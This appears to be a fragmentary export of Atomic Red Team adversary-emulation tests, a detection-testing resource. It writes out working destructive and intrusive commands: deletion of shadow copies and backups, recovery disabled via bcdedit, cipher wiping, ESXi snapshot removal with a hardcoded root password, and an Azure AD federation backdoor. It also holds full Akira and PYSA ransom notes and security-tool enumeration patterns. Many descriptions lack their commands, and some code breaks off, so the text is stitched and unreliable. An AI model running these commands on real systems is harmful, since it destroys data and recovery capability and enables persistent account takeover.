Description: This test simulates an adversary executing the Windows Resource kit utility SubInAcl. This utility was abused by adversaries in the past in order to modify access permissions. Upon execution, a process creation log should be generated indicating successful execution.
Description: Changes a file or folder's ownership only recursively using chown.
T1222.002 - File and Directory Permissions Modification: FreeBSD, Linux and Mac File and Directory Permissions Modification
chattr - Remove immutable file attribute
chattr -i /var/spool/cron/root
Description: Removes a file's `immutable` attribute using `chattr`.
This technique was used by the threat actor Rocke during the compromise of Linux web servers.
T1222.002 - File and Directory Permissions Modification: FreeBSD, Linux and Mac File and Directory Permissions Modification
Description: Removes a file's `immutable` attribute using `chflags`.
This technique was used by the threat actor Rocke during the compromise of Linux web servers.
T1222.002 - File and Directory Permissions Modification: FreeBSD, Linux and Mac File and Directory Permissions Modification
Chmod through c script
/tmp/T1222002 /tmp/ T1222002
Description: chmods a file using a C script.
Prereq: Compile the script from (T1222.002/src/T1222.002.c). Destination is /tmp/T1222002
gcc T1222.002/src/T1222.002.c -o /tmp/T1222002
T1222.002 - File and Directory Permissions Modification: FreeBSD, Linux and Mac File and Directory Permissions Modification
Chmod through c script (freebsd)
/tmp/T1222002 /tmp/ T1222002
Description: chmods a file using a C script.
Prereq: Compile the script from (T1222.002/src/T1222.002.c). Destination is /tmp/T1222002
cc T1222.002/src/T1222.002.c -o /tmp/T1222002
T1222.002 - File and Directory Permissions Modification: FreeBSD, Linux and Mac File and Directory Permissions Modification
Chown through c script
sudo /tmp/T1222002own T1222.002/src/chown.c
Description: chowns a file to root using a C script.
Prereq: Compile the script from (T1222.002/src/chown.c). Destination is /tmp/T1222002own
gcc T1222.002/src/chown.c -o /tmp/T1222002own
T1222.002 - File and Directory Permissions Modification: FreeBSD, Linux and Mac File and Directory Permissions Modification
Chown through c script (freebsd)
/tmp/T1222002own T1222.002/src/chown.c
Description: chowns a file to root using a C script.
Prereq: Compile the script from (T1222.002/src/chown.c). Destination is /tmp/T1222002own
cc T1222.002/src/chown.c -o /tmp/T1222002own
T1222 - File and Directory Permissions Modification
Enable Local and Remote Symbolic Links via fsutil
fsutil behavior set SymlinkEvaluation R2L:1
fsutil behavior set SymlinkEvaluation R2R:1
Description: Use fsutil to enable both ‘remote to local’ and ‘remote to remote’ symbolic links. This allows access to files from local shortcuts with local or remote paths.
[reference](https://symantec-enterprise-blogs.security.com/threat-intelligence/noberus-blackcat-alphv-rust-ransomware/)
Cleanup:
fsutil behavior set SymlinkEvaluation R2L:0
fsutil behavior set SymlinkEvaluation R2R:0
T1222 - File and Directory Permissions Modification
Enable Local and Remote Symbolic Links via reg.exe
Description: Use reg.exe to enable both ‘remote to local’ and ‘remote to remote’ symbolic links. This allows access to files from local shortcuts with local or remote paths.
[reference](https://symantec-enterprise-blogs.security.com/threat-intelligence/noberus-blackcat-alphv-rust-ransomware/)
Description: Use Powershell to enable both ‘remote to local’ and ‘remote to remote’ symbolic links. This allows access to files from local shortcuts with local or remote paths.
[reference](https://symantec-enterprise-blogs.security.com/threat-intelligence/noberus-blackcat-alphv-rust-ransomware/)
Description: Uses the dsquery command to discover domain trusts.
Requires the installation of dsquery via Windows RSAT or the Windows Server AD DS role.
T1482 - Domain Trust Discovery
Windows - Discover domain trusts with nltest
nltest /domain_trusts
nltest /trusted_domains
Description: Uses the nltest command to discover domain trusts.
Requires the installation of nltest via Windows RSAT or the Windows Server AD DS role.
This technique has been used by the Trickbot malware family.
Prereq: nltest.exe from RSAT must be present on disk
Description: Use powershell to enumerate AD information.
Requires the installation of PowerShell AD admin cmdlets via Windows RSAT or the Windows Server AD DS role.
Prereq: PowerView PowerShell script must exist on disk
if (Test-Path "..\ExternalPayloads\PowerView.ps1") {exit 0} else {exit 1}
Prereq: RSAT PowerShell AD admin cmdlets must be installed
Description: The AdFind tool can be used for reconnaissance in an Active Directory environment. This example has been documented by ransomware actors enumerating Active Directory OUs.
References: http://www.joeware.net/freetools/tools/adfind/, https://www.fireeye.com/blog/threat-research/2019/04/pick-six-intercepting-a-fin6-intrusion.html
Prereq: AdFind.exe must exist on disk at specified location (PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe)
if (Test-Path "..\ExternalPayloads\AdFind.exe") {exit 0} else {exit 1}
Description: The AdFind tool can be used for reconnaissance in an Active Directory environment. This example has been documented by ransomware actors enumerating Active Directory trusts.
References: http://www.joeware.net/freetools/tools/adfind/, https://www.fireeye.com/blog/threat-research/2019/04/pick-six-intercepting-a-fin6-intrusion.html
Prereq: AdFind.exe must exist on disk at specified location (PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe)
if (Test-Path "..\ExternalPayloads\AdFind.exe") {exit 0} else {exit 1}
Description: Utilizing PowerView, run Get-DomainTrust to identify domain trusts. Upon execution, progress and info about trusts within the domain being scanned will be displayed.
Description: Utilizing PowerView, run Get-ForestTrust to identify forest trusts. Upon execution, progress and info about forest trusts within the domain being scanned will be displayed.
Description: Iterative AD discovery toolkit for offensive operators. Situational awareness and targeted low-noise enumeration, with a preference for OpSec. https://github.com/dsnezhkov/TruffleSnout
Prereq: TruffleSnout.exe must exist on disk at specified location (..\ExternalPayloads\TruffleSnout.exe)
if (Test-Path "..\ExternalPayloads\TruffleSnout.exe") {exit 0} else {exit 1}
T1484.001 - Domain Policy Modification: Group Policy Modification
if ($domain.AuthenticationType -eq "Federated") {
    Write-Host "Error: domain ""contoso.com"" already federated. Try with a different domain or re-create it before."
    exit 1
}
$at = Get-AADIntAccessTokenForAADGraph -Credentials $Credential
if (-Not $at) {
    Write-Host "Error: AADInternals could not connect"
    exit 1
}
$new = ConvertTo-AADIntBackdoor -AccessToken $at -DomainName "contoso.com"
if ($new) {
    Write-Host "Federation successfully added to Azure AD"
    Write-Host $new
} else {
    Write-Host "The federation setup failed"
}
Write-Host "End of federation configuration."
Description: Add a new federated domain to Azure AD using PowerShell.
The malicious domain to be federated must be configured beforehand (outside of the scope of this test):
1. Open Azure Portal
2. Add a new "custom domain name"
3. Verify the domain by following instructions (i.e. create the requested DNS record)
Prereq: AzureAD and AADInternals Powershell modules must be installed.
Description: Overwrites and deletes a file using SysInternals SDelete. Upon successful execution, "Files deleted: 1" will be displayed in
the powershell session along with other information about the file that was deleted.
Prereq: Secure delete tool from SysInternals must exist on disk at specified location (..\ExternalPayloads\Sdelete\sdelete.exe)
if (Test-Path "..\ExternalPayloads\Sdelete\sdelete.exe") {exit 0} else {exit 1}
Description: Overwrites and deletes a file using DD.
To stop the test, break the command with CTRL/CMD+C.
T1485 - Data Destruction
Overwrite deleted data on C drive
cipher.exe /w:C:
Description: RansomEXX malware wipes all deleted files using the Windows built-in cipher.exe to prevent forensic recovery.
This process is very slow and test execution may timeout.
https://www.cybereason.com/blog/cybereason-vs.-ransomexx-ransomware
https://support.microsoft.com/en-us/topic/cipher-exe-security-tool-for-the-encrypting-file-system-56c85edd-85cf-ac07-f2f7-ca2d35dab7e4
T1485 - Data Destruction
GCP - Delete Bucket
gcloud config set project atomic-test-1
gcloud storage buckets delete gs://atomic-red-team-bucket
Description: This Atomic will create a Google Storage Bucket then delete it. The idea for this Atomic came from a Rule published by the Elastic team.
Identifies when a Google Cloud Platform (GCP) storage bucket is deleted. An adversary may delete a storage bucket in order to disrupt their target's business operations.
This atomic will create a bucket then delete the bucket.
Reference: https://github.com/elastic/detection-rules/blob/main/rules/integrations/gcp/impact_gcp_storage_bucket_deleted.toml
Prereq: Requires gcloud
if [ -x "$(command -v gcloud)" ]; then exit 0; else exit 1; fi;
Prereq: Check if user is logged in
gcloud config get-value account
Prereq: Check if terraform is installed.
terraform version
Prereq: Create dependency resources using terraform
stat "$T1485/src/T1485-4/terraform.tfstate"
Cleanup:
cd "$T1485/src/T1485-4/"
terraform state rm google_storage_bucket.bucket
terraform destroy -auto-approve
T1485 - Data Destruction
ESXi - Delete VM Snapshots
echo "" | "..\ExternalPayloads\plink.exe" -batch "atomic.local" -ssh -l root -pw "password" "for i in `vim-cmd vmsvc/getallvms | awk 'NR>1 {print $1}'`; do vim-cmd vmsvc/snapshot.removeall $i & done"
Description: Deletes all snapshots for all Virtual Machines on an ESXi Host
[Reference](https://lolesxi-project.github.io/LOLESXi/lolesxi/Binaries/vim-cmd/#inhibit%20recovery)
Prereq: Check if we have plink
if (Test-Path "..\ExternalPayloads\plink.exe") {exit 0} else {exit 1}
Description: Attempts to encrypt data on the target system as root to simulate an interruption of authentication to the target system. If root permissions are not available, it attempts to encrypt data within the user's home directory.
Prereq: Finds where ccencrypt and ccdecrypt are located
Description: Builds the IOC (YOUR_FILES.txt) for the PureLocker ransomware.
https://www.bleepingcomputer.com/news/security/purelocker-ransomware-can-lock-files-on-windows-linux-and-macos/
Cleanup:
del %USERPROFILE%\Desktop\YOUR_FILES.txt >nul 2>&1
T1486 - Data Encrypted for Impact
Encrypt files using 7z utility - macOS
7z a -p ARTPass -mhe=on ARTArchive.7z ~/test.txt
Description: This test encrypts the file(s) using the 7z utility
Prereq: Check if 7z command exists on the machine
which 7z
Cleanup:
rm ARTArchive.7z
T1486 - Data Encrypted for Impact
Encrypt files using openssl utility - macOS
openssl enc -pbkdf2 -in ~/test.txt -out ARTFile
Description: This test encrypts the file(s) using the openssl utility
Cleanup:
rm ARTFile
T1486 - Data Encrypted for Impact
Data Encrypted with GPG4Win
Set-Content -Path "$env:temp\test.txt" -Value "populating this file with some text" # Create the test.txt file again in case prereqs failed
cmd /c "`"C:\Program Files (x86)\GnuPG\bin\gpg.exe`" --passphrase 'SomeParaphraseBlah' --batch --yes -c `"$env:temp\test.txt`""
Description: Gpg4win is a Windows tool (also called Kleopatra, which is the preferred certificate manager) that uses email and file encryption packages for symmetric encryption. It is used by attackers to encrypt disks. The user will need to add a passphrase to encrypt the file, as automation is not allowed under newer versions.
Prereq: GPG must exist at (C:\Program Files (x86)\GnuPG\bin\gpg.exe). If -GetPrereqs fails, try to install GPG4WIN manually at 'https://www.gpg4win.org/download.html'. Once done, run -CheckPrereqs to confirm that it works.
if (test-path 'C:\Program Files (x86)\GnuPG\bin\gpg.exe'){exit 0} else {exit 1}
Description: DiskCryptor, an open source encryption utility, can be exploited by adversaries for encrypting all disk partitions, including system partitions. This tool was identified in a ransomware campaign, as reported on https://thedfirreport.com/2021/11/15/exchange-exploit-leads-to-domain-wide-ransomware/. The documentation for DiskCryptor can be found at https://github.com/DavidXanatos/DiskCryptor. During the installation process, running dcrypt.exe starts the encryption console. It's important to note that a system reboot is necessary as part of the installation.
Prereq: dcrypt_setup will be installed at specified location (dcrypt.exe)
if (Test-Path "${env:ProgramFiles}/dcrypt/dcrypt.exe") {exit 0} else {exit 1}
T1486 - Data Encrypted for Impact
Akira Ransomware drop Files with .akira Extension and Ransomnote
1..100 | ForEach-Object { $out = new-object byte[] 1073741; (new-object Random).NextBytes($out); [IO.File]::WriteAllBytes("c:\test.$_.akira", $out) }
echo "Hi friends" >> $env:Userprofile\Desktop\akira_readme.txt
echo "" >> $env:Userprofile\Desktop\akira_readme.txt
echo "Whatever who you are and what your title is if you' re reading this it means the internal infrastructure of your company is fully or partially dead, all your backups - virtual, physical - everything that we managed to reach - are completely removed. Moreover, we have taken a great amount of your corporate data prior to encryption Well, for now let's keep all the tears and resentment to ourselves and try to build a constructive dialogue. We're fully aware of what damage we caused by locking your internal sources. At the moment. you have to know: " >> $env:Userprofile\Desktop\akira_readme.txt
echo "1. Dealing with us you will save A LOT due to we are not interested in ruining your financially. We will study in depth your finance, bank income statements, your savings, investments etc. and present our reasonable demand to you. If you have an active cyber insurance, let us know and we will guide you how to properly use it. Also, dragging out the negotiation process will lead to failing of a deal" >> $env:Userprofile\Desktop\akira_readme.txt
echo "2. Paying us you save your TIME, MONEY, EFFORTS and be back on track within 24 hours approximately. Our decryptor works properly on any files or systems, so you will be able to check it by requesting a test decryption service from the beginning of our conversation. [f you decide to recover on your own, keep in mind that you can permanently lose access to some files or accidently corrupt them — in this case we won't be able to help. " >> $env:Userprofile\Desktop\akira_readme.txt
echo "3. The security report or the exclusive first-hand information that you will receive upon reaching an agreement is of a great value, since NO full audit of your network will show you the vulnerabilities that we' ve managed to detect and used in order to get into. identify backup solutions and upload your data." >> $env:Userprofile\Desktop\akira_readme.txt
echo "4. As for your data, if we fail to agree, we will try to sell personal information/trade secrets/databases/source codes — generally speaking, everything that has a value on the darkmarket - to multiple threat actors at ones." >> $env:Userprofile\Desktop\akira_readme.txt
echo "Then all of this will be published in our blog -" >> $env:Userprofile\Desktop\akira_readme.txt
echo "" >> $env:Userprofile\Desktop\akira_readme.txt
echo "https://akira.onion" >> $env:Userprofile\Desktop\akira_readme.txt
echo "" >> $env:Userprofile\Desktop\akira_readme.txt
echo "5. We're more than negotiable and will definitely find the way to settle this quickly and reach an agreement which will satisfy both of us" >> $env:Userprofile\Desktop\akira_readme.txt
echo "" >> $env:Userprofile\Desktop\akira_readme.txt
echo "If you' re indeed interested in our assistance and the services we provide you can reach out to us following simple instructions:" >> $env:Userprofile\Desktop\akira_readme.txt
echo "" >> $env:Userprofile\Desktop\akira_readme.txt
echo "1. Install TOR Browser to get access to our chat room - https://www.torproject.org/download/." >> $env:Userprofile\Desktop\akira_readme.txt
echo "2. Paste this link - https://akira.onion" >> $env:Userprofile\Desktop\akira_readme.txt
echo "3. Use this code - - to log into our chat." >> $env:Userprofile\Desktop\akira_readme.txt
echo "" >> $env:Userprofile\Desktop\akira_readme.txt
echo "Keep in mind that the faster you will get in touch, the less damage we cause" >> $env:Userprofile\Desktop\akira_readme.txt
Description: Drops 100 files with random content and the .akira file extension to c:\ and writes the Akira ransom note.
Cleanup:
del $env:Userprofile\Desktop\akira_readme.txt
del c:\test.*.akira
T1489 - Service Stop
Windows - Stop service using Service Controller
sc.exe stop spooler
Description: Stops a specified service using the sc.exe command. Upon execution, if the spooler service was running, information will be displayed saying
it has changed to a state of STOP_PENDING. If the spooler service was not running, "The service has not been started." will be displayed and it can be
started by running the cleanup command.
Cleanup:
sc.exe start spooler >nul 2>&1
T1489 - Service Stop
Windows - Stop service using net.exe
net.exe stop spooler
Description: Stops a specified service using the net.exe command. Upon execution, if the service was running "The Print Spooler service was stopped successfully."
will be displayed. If the service was not running, "The Print Spooler service is not started." will be displayed and it can be
started by running the cleanup command.
Cleanup:
net.exe start spooler >nul 2>&1
T1489 - Service Stop
Windows - Stop service by killing process
taskkill.exe /f /im spoolsv.exe
Description: Stops a specified service by killing the service's process.
This technique was used by WannaCry. Upon execution, if the spoolsv service was running "SUCCESS: The process "spoolsv.exe" with PID 2316 has been terminated."
will be displayed. If the service was not running "ERROR: The process "spoolsv.exe" not found." will be displayed and it can be
started by running the cleanup command.
T1489 - Service Stop
Linux - Stop service using systemctl
sudo systemctl stop cron
Description: Stops a specified service using the systemctl command.
Upon execution, if the specified service was running, it will change to a state of inactive and it can be restarted by running the cleanup command.
You can list all available services with the following command: "systemctl list-units --type=service"
Cleanup:
sudo systemctl start cron 2> /dev/null
T1489 - Service Stop
Linux - Stop service by killing process using killall
sudo killall -SIGTERM cron
Description: Stops a specified service by sending a SIGTERM signal to the linked process using the killall command.
Upon execution, if the service's main process was running, it will be terminated.
If the service was not running, no process will be found to kill and it can be restarted by running the cleanup command.
You can list all available services with the following command: "systemctl list-units --type=service"
Cleanup:
sudo systemctl start cron 2> /dev/null
T1489 - Service Stop
Linux - Stop service by killing process using kill
sudo kill -SIGTERM $(pgrep cron)
Description: Stops a specified service by sending a SIGTERM signal to the linked process using the kill command. Upon execution, if the service's main process was running, it will be terminated.
If the service was not running, no process will be found to kill and it can be restarted by running the cleanup command.
You can list all available services with the following command: "systemctl list-units --type=service"
Cleanup:
sudo systemctl start cron 2> /dev/null
T1489 - Service Stop
Linux - Stop service by killing process using pkill
sudo pkill -SIGTERM ^cron$
Description: Stops a specified service by sending a SIGTERM signal to the linked process using pkill. This method is effective when multiple instances of the process may be running.
Upon execution, if any instances of the process were running, they will be terminated. If no instances were running, pkill will not find any processes to kill.
The stopped service can be restarted by running the cleanup command.
You can list all available services with the following command: "systemctl list-units --type=service"
Cleanup:
sudo systemctl start cron 2> /dev/null
T1489 - Service Stop
Abuse of Linux magic system request key to send a SIGTERM to all processes
echo "e" > /proc/sysrq-trigger
Description: Adversaries with root or sufficient privileges can send a SIGTERM to all processes except init. By writing 'e' to /proc/sysrq-trigger, they can forcibly terminate all processes except init.
T1490 - Inhibit System Recovery
Windows - Delete Volume Shadow Copies
vssadmin.exe delete shadows /all /quiet
Description: Deletes Windows Volume Shadow Copies. This technique is used by numerous ransomware families and APT malware such as Olympic Destroyer. Upon
execution, if no shadow volumes exist the message "No items found that satisfy the query." will be displayed. If shadow volumes are present, it
will delete them without printing output to the screen. This is because the /quiet parameter was passed which also suppresses the y/n
confirmation prompt. Shadow copies can only be created on Windows server or Windows 8.
https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-R2-and-2012/cc788055(v=ws.11)
Prereq: Create volume shadow copy of C:\ . This prereq command only works on Windows Server or Windows 8.
if(!(vssadmin.exe list shadows | findstr "No items found that satisfy the query.")) { exit 0 } else { exit 1 }
T1490 - Inhibit System Recovery
Windows - Delete Volume Shadow Copies via WMI
wmic.exe shadowcopy delete
Description: Deletes Windows Volume Shadow Copies via WMI. This technique is used by numerous ransomware families and APT malware such as Olympic Destroyer.
Prereq: Create volume shadow copy of C:\ .
if(!(vssadmin.exe list shadows | findstr "No items found that satisfy the query.")) { exit 0 } else { exit 1 }
T1490 - Inhibit System Recovery
Windows - wbadmin Delete Windows Backup Catalog
wbadmin delete catalog -quiet
Description: Deletes Windows Backup Catalog. This technique is used by numerous ransomware families and APT malware such as Olympic Destroyer. Upon execution,
"The backup catalog has been successfully deleted." will be displayed in the PowerShell session.
T1490 - Inhibit System Recovery
Windows - Disable Windows Recovery Console Repair
bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures
bcdedit.exe /set {default} recoveryenabled no
Description: Disables repair by the Windows Recovery Console on boot. This technique is used by numerous ransomware families and APT malware such as Olympic Destroyer.
Upon execution, "The operation completed successfully." will be displayed in the powershell session.
Description: Deletes Windows Volume Shadow Copies with PowerShell code and Get-WMIObject.
This technique is used by numerous ransomware families such as Sodinokibi/REvil.
Executes Get-WMIObject. Shadow copies can only be created on Windows Server or Windows 8, so upon execution
there may be no output displayed.
Description: Deletes backup files in a manner similar to Ryuk ransomware. Upon execution, many "access is denied" messages will appear as the commands try
to delete files from around the system.
T1490 - Inhibit System Recovery
Windows - wbadmin Delete systemstatebackup
wbadmin delete systemstatebackup -keepVersions:0
Description: Deletes the Windows systemstatebackup using wbadmin.exe. This technique is used by numerous ransomware families. This may only be successful on server platforms that have Windows Backup enabled.
Description: Modify the registry of the currently logged-in user using reg.exe via the cmd console to disable System Restore on the computer.
See how Remcos RAT abuses this technique: https://www.virustotal.com/gui/file/2d7855bf6470aa323edf2949b54ce2a04d9e38770f1322c3d0420c2303178d91/details
Description: Adversaries generally try to resize the shadow storage volume using vssadmin.exe so that shadow volumes cannot be created again. This technique is typically used by adversaries during a ransomware event as a precursor to deleting the shadow storage.
Description: This atomic test alters the security settings of the Volume Shadow Copy Service (VSS) by modifying its permissions, potentially impacting system recovery operations. The specific permissions set by the command are as follows:
- Deny Generic All (GA) permissions to Network Users (NU)
- Deny GA permissions to Everyone (WD)
- Deny GA permissions to Anonymous (AN)
- Allow Full Access (FA) and Generic All (GA) permissions to Everyone (WD) in System ACL (SACL)
- Allow Object Inherit and Inherit Only (OIIO) Full Access (FA) and GA permissions to Everyone (WD) in SACL
These permissions can significantly restrict VSS functionalities, including backup and restore operations. As such, it is essential to run this test only in a controlled environment with administrative privileges.
A cleanup command is provided to reset VSS permissions to a common default configuration, which should be verified against your specific system's configuration. It's crucial to use this cleanup command after testing to ensure the system's backup and recovery capabilities remain functional. Running this test on a production system or critical environment is not recommended without proper precautions and a robust recovery plan.
Description: Disables Time Machine which is Apple's automated backup utility software. Attackers can use this to prevent backups from occurring and hinder the victim's ability to recover from any damage.
public class Wallpaper{
    [DllImport("user32.dll", CharSet=CharSet.Auto)]
    static extern int SystemParametersInfo (int uAction , int uParam , string lpvParam , int fuWinIni) ;
Description: Downloads an image from a URL and sets it as the desktop wallpaper.
Cleanup:
$updateWallpapercode = @'
using System.Runtime.InteropServices;
namespace Win32{
    public class Wallpaper{
        [DllImport("user32.dll", CharSet=CharSet.Auto)]
        static extern int SystemParametersInfo (int uAction , int uParam , string lpvParam , int fuWinIni) ;
Configure LegalNoticeCaption and LegalNoticeText registry keys to display ransom message
$orgLegalNoticeCaption = (Get-ItemProperty HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System -Name LegalNoticeCaption).LegalNoticeCaption
$orgLegalNoticeText = (Get-ItemProperty HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System -Name LegalNoticeText).LegalNoticeText
$newLegalNoticeCaption = "PYSA"
$newLegalNoticeText = "Hi Company, every byte on any types of your devices was encrypted. Don't try to use backups because it were encrypted too. To get all your data contact us:xxxx@onionmail.org"
Set-ItemProperty HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System -Name LegalNoticeCaption -Value $newLegalNoticeCaption -Type String -Force
Set-ItemProperty HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System -Name LegalNoticeText -Value $newLegalNoticeText -Type String -Force
Description: Display a ransom message to users at system start-up by configuring the registry keys HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\LegalNoticeCaption and HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\LegalNoticeText.
[SynAck Ransomware](https://www.trendmicro.com/vinfo/es/security/news/cybercrime-and-digital-threats/synack-ransomware-leverages-process-doppelg-nging-for-evasion-and-infection),
[Grief Ransomware](https://redcanary.com/blog/grief-ransomware/),
[Maze Ransomware](https://cyware.com/research-and-analysis/maze-ransomware-a-deadly-combination-of-data-theft-and-encryption-to-target-us-organizations-8f27),
[Pysa Ransomware](https://www.cybereason.com/blog/research/threat-analysis-report-inside-the-destructive-pysa-ransomware),
[Spook Ransomware](https://community.fortinet.com/t5/FortiEDR/Threat-Coverage-How-FortiEDR-protects-against-Spook-Ransomware/ta-p/204226),
[DopplePaymer Ransomware](https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Ransom:Win32/Dopplepaymer&threatId=-2147221958),
[Redeemer Ransomware](https://blog.cyble.com/2022/07/20/redeemer-ransomware-back-action/),
[Kangaroo Ransomware](https://www.bleepingcomputer.com/news/security/the-kangaroo-ransomware-not-only-encrypts-your-data-but-tries-to-lock-you-out-of-windows/)
$Title = "!!! READ_ME_NOW !!!"
$Body = "Your files are SAFE. This is a TEST note for detection validation by bak3n3k0. No data has been encrypted. This simulation exercises detections for: - notepad.exe launched with a ransom-themed text file - creation of a ransom-themed text file in %TEMP% NON-DESTRUCTIVE Atomic Red Team test. "
Description: Creates a temporary ransom-note text file and opens it in Notepad to
simulate ransomware "note display" behavior without making destructive
changes. SAFE and non-destructive.
Description: Windows Management Instrumentation (WMI) objects contain system information which helps to detect virtualization. This command will specifically attempt to get the CurrentTemperature value from this object and will check whether the attempt results in an error that contains the word "supported". This is meant to find the result "Not supported", which is the result if run in a virtual machine.
Cleanup:
$error.clear()
T1497.001 - Virtualization/Sandbox Evasion: System Checks
Detect Virtualization Environment via ioreg
if (ioreg -l | grep -e Manufacturer -e 'Vendor Name' | grep -iE 'Oracle|VirtualBox|VMWare|Parallels') then echo 'Virtualization Environment detected'; fi;
Description: ioreg contains registry entries for all the device drivers in the system. If it's a virtual machine, one of the device manufacturers will be a virtualization software vendor.
T1497.001 - Virtualization/Sandbox Evasion: System Checks
Detect Virtualization Environment via WMI Manufacturer/Model Listing (Windows)
Description: Windows Management Instrumentation (WMI) objects contain system information which helps to detect virtualization. This test will get the model and manufacturer of the machine to determine if it is a virtual machine, such as one running under VMware or VirtualBox.
T1497.001 - Virtualization/Sandbox Evasion: System Checks
Detect Virtualization Environment using sysctl (hw.model)
if [ "$(sysctl -n hw.model | grep -v 'Mac')" != "" ]; then echo 'Virtualization Environment detected'; fi;
Description: sysctl hw.model will return the model name of the hardware (Macmini8,1, MacBookAir10,1, etc.) in the case of native Apple hardware
but will return the hypervisor name (e.g. VMware7,0) in a virtual machine.
Reference: https://evasions.checkpoint.com/src/MacOS/macos.html#hardware-model
T1497.001 - Virtualization/Sandbox Evasion: System Checks
Check if System Integrity Protection is enabled
if [ "$(csrutil status | grep -v 'enabled')" != "" ]; then echo 'Possible Virtualization Environment detected'; fi;
Description: The latest versions of macOS have the System Integrity Protection feature (SIP). If a sandbox uses a non-signed
kernel extension for monitoring purposes, the SIP feature must be disabled to load this kind of kernel extension.
Malware may check if SIP is enabled.
Reference: https://evasions.checkpoint.com/src/MacOS/macos.html#sip
T1497.001 - Virtualization/Sandbox Evasion: System Checks
Detect Virtualization Environment using system_profiler
Description: system_profiler provides system hardware and software configuration and the Model Identifier should provide the value similar to (sysctl -n hw.model).
We should be able to find whether virtualization is enabled by checking whether the Model Identifier does not contain "Mac".
T1497.003 - Time Based Evasion
Delay execution with ping
ping -c 250 8.8.8.8 > /dev/null
whoami
Description: Uses the ping command to introduce a delay before executing a malicious payload.
T1505.002 - Server Software Component: Transport Agent
Description: Install a Microsoft Exchange Transport Agent for persistence. This requires execution from an Exchange Client Access Server and the creation of a DLL with specific exports. Seen in use by Turla.
More details: https://docs.microsoft.com/en-us/exchange/transport-agents-exchange-2013-help
Prereq: Microsoft Exchange SnapIn must be installed
Description: This test simulates an adversary leveraging Web Shells by simulating the file modification to disk.
Idea from APTSimulator.
cmd.aspx source - https://github.com/tennc/webshell/blob/master/fuzzdb-webshell/asp/cmd.aspx
Prereq: Web shell must exist on disk at specified location (T1505.003\src)
if (Test-Path "T1505.003\src") {exit 0} else {exit 1}
Cleanup:
del C:\inetpub\wwwroot\b.jsp /q >nul 2>&1
del C:\inetpub\wwwroot\tests.jsp /q >nul 2>&1
del C:\inetpub\wwwroot\cmd.aspx /q >nul 2>&1
Description: The following Atomic will utilize AppCmd.exe to install a new IIS Module. IIS must be installed.
This atomic utilizes a DLL on disk, but to test further suspiciousness, compile and load [IIS-Raid](https://www.mdsec.co.uk/2020/02/iis-raid-backdooring-iis-using-native-modules/).
A successful execution will install a module into IIS using AppCmd.exe.
[Managing and installing Modules Reference](https://learn.microsoft.com/en-us/iis/get-started/introduction-to-iis/iis-modules-overview#to-install-a-module-using-appcmdexe)
[IIS Modules](https://www.microsoft.com/en-us/security/blog/2022/12/12/iis-modules-the-evolution-of-web-shells-and-how-to-detect-them/)
Prereq: IIS must be installed in order to add a module to IIS.
$service = get-service w3svc -ErrorAction SilentlyContinue
if($service){ Write-Host "IIS installed on $env:computername" } else { Write-Host "IIS is not installed on $env:computername" }
Description: The following Atomic will utilize PowerShell Cmdlet New-WebGlobalModule to install a new IIS Module. IIS must be installed.
This atomic utilizes a DLL on disk, but to test further suspiciousness, compile and load [IIS-Raid](https://www.mdsec.co.uk/2020/02/iis-raid-backdooring-iis-using-native-modules/).
A successful execution will install a module into IIS using New-WebGlobalModule.
[Managing IIS Modules with PowerShell](https://learn.microsoft.com/en-us/powershell/module/webadministration/set-webglobalmodule?view=windowsserver2022-ps)
[IIS Modules](https://www.microsoft.com/en-us/security/blog/2022/12/12/iis-modules-the-evolution-of-web-shells-and-how-to-detect-them/)
Prereq: IIS must be installed in order to add a module to IIS.
$service = get-service w3svc -ErrorAction SilentlyContinue
if($service){ Write-Host "IIS installed on $env:computername" } else { Write-Host "IIS is not installed on $env:computername" }
Description: Simulates patching of termsrv.dll by making a benign change to the file and replacing it with the original afterwards.
Before we can make the modifications we need to take ownership of the file and grant ourselves the necessary permissions.
# Check if the registry key exists
if (Test-Path -Path $registryPath) {
    # Modify the ServiceDll value in the registry
    Set-ItemProperty -Path $registryPath -Name "ServiceDll" -Value $newServiceDll
    Write-Host "ServiceDll value in the registry has been updated to: $newServiceDll"
} else {
    Write-Host "Registry key not found. Make sure the 'TermService\Parameters' key exists."
}
Description: This atomic test simulates the modification of the ServiceDll value in HKLM\System\CurrentControlSet\services\TermService\Parameters. This technique may be leveraged by adversaries to establish persistence by loading a patched version of the DLL containing malicious code.
Description: Methods to identify security software on an endpoint.
When successfully executed, the test is going to display running processes, the firewall configuration of the network profiles,
and specific security software.
Description: Methods to identify security software on an endpoint.
When successfully executed, PowerShell is going to display processes related to AV products if they are running.
Note that, depending on the privileges of the current user, get-process | ?{$_.Description -like "*"} may not return the processes related to the AV products being checked.
For instance, only with Administrator rights can you see the process description of McAfee processes. Hence, it is better to use get-process | ?{$_.ProcessName -like "*"}
if you know the names of those processes.
ps aux | egrep 'Little\ Snitch|CbOsxSensorService|falcond|nessusd|santad|CbDefense|td-agent|packetbeat|filebeat|auditbeat|osqueryd|BlockBlock|LuLu'
Description: Methods to identify security software on an endpoint.
When successfully executed, the command shell is going to display the AV/security software that is running.
ps aux | egrep 'falcond|nessusd|cbagentd|td-agent|packetbeat|filebeat|auditbeat|osqueryd'
Description: Methods to identify security software on an endpoint.
When successfully executed, the command shell is going to display the AV/security software that is running.
Description: Methods to identify security software on an endpoint.
When successfully executed, the command shell is going to display the AV/security software that is running.
Description: Discovery of an installed Sysinternals Sysmon service using the driver altitude (even if the name is changed).
When successfully executed, the test is going to display the Sysmon driver instance if it is installed.
Description: Discovery of installed antivirus products via the Get-CimInstance and Get-WmiObject cmdlets of PowerShell.
When successfully executed, information about installed AV software is displayed.
Security Software Discovery - Windows Defender Enumeration
Get-Service WinDefend #check the service state of Windows Defender
Get-MpComputerStatus #provides the current status of security solution elements, including Anti-Spyware, Antivirus, LoavProtection, Real-time protection, etc
Get-MpThreat #threats details that have been detected using MS Defender
